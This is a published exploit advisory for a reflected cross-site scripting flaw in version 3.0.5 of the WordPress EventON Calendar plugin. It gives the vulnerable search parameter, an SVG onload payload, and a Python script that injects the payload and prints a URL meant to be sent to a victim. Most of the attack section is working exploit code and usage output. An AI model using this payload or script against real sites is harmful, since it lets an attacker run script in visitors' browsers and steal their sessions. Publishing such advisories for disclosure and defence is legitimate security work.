Wordpress Plugin EventON Calendar 3.0.5 Reflected Cross-Site Scripting

2020.12.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting # Date: 27.11.2020 # Exploit Author: b3kc4t (Mustafa GUNDOGDU) # Vendor Homepage: https://www.myeventon.com/ # Version: 3.0.5 # Tested on: Ubuntu 18.04 # CVE : 2020-29395 # Description Link: https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS """ ~ VULNERABLITY DETAILS ~ https://target/addons/?q=<svg/onload=alert(/b3kc4t/)> # WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected into the search field. # The following python code will inject javascript code and print out url that will be sent to victim. If you use unicode caracters for xss , exploit will print page source. ##USAGE## $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>' ##OUTPUT## [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)> """ import requests import sys import argparse from colorama import Fore def vuln_reflected(url, payload): s = requests.Session() get_request = s.get(url+payload) if get_request.status_code == 500: print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]") else: content_result = str(get_request.content) search_find = content_result.find(payload) if search_find != -1: print(Fore.GREEN+"[+] "+str(url)+str(payload)) else: print(content_result) def main(): desc = "Wordpress EventON Calendar Plugin XSS" parser = argparse.ArgumentParser(description=desc) exp_option = parser.add_argument_group('') parser.add_argument("--exploit", help ="", action='store_true') parser.add_argument("--url",help="", type=str, required=False) parser.add_argument("--payload",help="",type=str,required=False) args = parser.parse_args() if args.exploit: if args.url: if args.payload: url = args.url payload = args.payload vuln_reflected(url, payload) if name == 'main': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top